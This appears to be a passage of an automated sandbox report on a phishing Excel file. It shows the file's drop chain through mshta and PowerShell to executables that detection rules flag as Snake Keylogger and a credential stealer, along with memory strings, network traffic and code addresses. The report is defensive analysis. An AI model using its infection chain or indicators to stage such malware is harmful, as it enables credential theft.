0000001D.00000002.626231318.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002977000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
                        Source: sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C401000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C3A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                        Source: SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx, 44330000.0.dr, ~DF8426740EAF6412F3.TMP.0.drString found in binary or memory: https://www.business.hsbc.com.hk/en-gb/resource-centre/commercial-tariffs)
                        Source: sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                        Source: bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                        Source: bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                        Source: bKVNuVuE.exe, 0000001D.00000002.629343652.00000000039BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                        Source: bKVNuVuE.exe, 0000001D.00000002.629343652.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.0000000003A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                        Source: bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
                        Source: bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.00000000039BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                        Source: bKVNuVuE.exe, 0000001D.00000002.629343652.0000000003A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                        Source: sihost.exe, 00000011.00000002.629360646.0000000003799000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.00000000039F3000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.629343652.0000000003A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
                        Source: SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx, 44330000.0.dr, ~DF8426740EAF6412F3.TMP.0.drString found in binary or memory: https://www.online-banking.business.hsbc.com.hk/portalserver/hsbc/dbbpage/commercial/online/timetabl
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49223
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49221
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49219
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49218
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49216
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49215
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49212
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49210
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49190 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49198 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49209
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49206
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49201
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49197 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49199
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49198
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49197
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49201 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49190
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 443
                        Source: unknownHTTPS traffic detected: 159.203.133.15:443 -> 192.168.2.22:49161 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 159.203.133.15:443 -> 192.168.2.22:49163 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49199 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49202 version: TLS 1.2
                        Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                        System Summary

                        barindex
                        Source: 12.2.sihost.exe.43da760.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 12.2.sihost.exe.43da760.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 12.2.sihost.exe.43da760.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                        Source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                        Source: 12.2.sihost.exe.441db80.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 12.2.sihost.exe.441db80.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 12.2.sihost.exe.441db80.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                        Source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                        Source: 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: Process Memory Space: sihost.exe PID: 3408, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxOLE: Microsoft Excel 2007+
                        Source: 44330000.0.drOLE: Microsoft Excel 2007+
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\40[1].htaJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\sihost.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sihost[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE8950352E7_2_000007FE8950352E
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0045F08012_2_0045F080
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0045E91012_2_0045E910
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0045C1C812_2_0045C1C8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_00459CA812_2_00459CA8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0045D08812_2_0045D088
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0045E2F812_2_0045E2F8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_00455AB012_2_00455AB0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0045E55812_2_0045E558
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_005111B812_2_005111B8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0051834012_2_00518340
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0051769812_2_00517698
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0051881812_2_00518818
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0051882812_2_00518828
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0051089012_2_00510890
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_00517AD012_2_00517AD0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_00517EF812_2_00517EF8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_00517F0812_2_00517F08
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036A02017_2_0036A020
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_003640F817_2_003640F8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036496817_2_00364968
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_003631B117_2_003631B1
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036E19017_2_0036E190
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_003669F017_2_003669F0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00363A2017_2_00363A20
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036930017_2_00369300
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_003643C817_2_003643C8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00368C2417_2_00368C24
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036348217_2_00363482
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_003674C817_2_003674C8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036854417_2_00368544
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00363E2817_2_00363E28
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00365E7017_2_00365E70
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036469917_2_00364699
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00369E8817_2_00369E88
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036E18017_2_0036E180
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036F18117_2_0036F181
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036D9F917_2_0036D9F9
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036DA0817_2_0036DA08
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036FAB117_2_0036FAB1
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036ECE817_2_0036ECE8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036F61917_2_0036F619
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036E76517_2_0036E765
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049874817_2_00498748
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00499F3017_2_00499F30
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049004017_2_00490040
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00496E4017_2_00496E40
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049404017_2_00494040
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049B24017_2_0049B240
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00499A5817_2_00499A58
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049405017_2_00494050
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049B25017_2_0049B250
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049206817_2_00492068
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00499A6817_2_00499A68
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049606817_2_00496068
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049F06717_2_0049F067
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049607817_2_00496078
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049F07817_2_0049F078
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00490E0817_2_00490E08
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00497C0817_2_00497C08
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049FA0817_2_0049FA08
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00494E0817_2_00494E08
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00494E1817_2_00494E18
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049E21117_2_0049E211
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00498C1017_2_00498C10
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049E22017_2_0049E220
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049CA3817_2_0049CA38
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00492E3017_2_00492E30
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00496E3017_2_00496E30
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049CA3217_2_0049CA32
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004932C817_2_004932C8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004972C817_2_004972C8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004990CA17_2_004990CA
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049A8C017_2_0049A8C0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004904D817_2_004904D8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004972D817_2_004972D8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004990D817_2_004990D8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004944DA17_2_004944DA
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049E6DA17_2_0049E6DA
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004944E817_2_004944E8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049E6E817_2_0049E6E8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049D88017_2_0049D880
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049129117_2_00491291
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049D89017_2_0049D890
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049809017_2_00498090
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049C0A817_2_0049C0A8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004912A017_2_004912A0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004980A017_2_004980A0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004952A017_2_004952A0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004932BA17_2_004932BA
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004952B017_2_004952B0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049A8B017_2_0049A8B0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049574817_2_00495748
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049DD4817_2_0049DD48
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049F54017_2_0049F540
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049DD5817_2_0049DD58
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049375017_2_00493750
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049776117_2_00497761
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049376017_2_00493760
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049097017_2_00490970
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049777017_2_00497770
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049C57017_2_0049C570
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049497017_2_00494970
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049AD7717_2_0049AD77
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049250017_2_00492500
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049CF0017_2_0049CF00
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049650217_2_00496502
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049B70717_2_0049B707
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049B71817_2_0049B718
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049651017_2_00496510
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00499F2617_2_00499F26
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049873917_2_00498739
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049173817_2_00491738
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049573817_2_00495738
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049D3C817_2_0049D3C8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00491BC117_2_00491BC1
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00495BD117_2_00495BD1
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00491BD017_2_00491BD0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049A3E817_2_0049A3E8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00493BEA17_2_00493BEA
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00495BE017_2_00495BE0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049BBE017_2_0049BBE0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00493BF817_2_00493BF8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049A3F817_2_0049A3F8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00497BF817_2_00497BF8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_00498BFF17_2_00498BFF
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049F9F717_2_0049F9F7
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049AD8817_2_0049AD88
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049958F17_2_0049958F
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049498017_2_00494980
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049299817_2_00492998
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049699A17_2_0049699A
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004969A817_2_004969A8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049EBA117_2_0049EBA1
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004995A017_2_004995A0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049D3B817_2_0049D3B8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0049EBB017_2_0049EBB0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004A004017_2_004A0040
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004A324017_2_004A3240
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004A644017_2_004A6440
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004A964017_2_004A9640
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004A806017_2_004A8060
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004A4E6017_2_004A4E60
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004A1C6017_2_004A1C60
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004A5E0017_2_004A5E00
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004A2C0017_2_004A2C00
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004A900017_2_004A9000
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_004A000617_2_004A0006
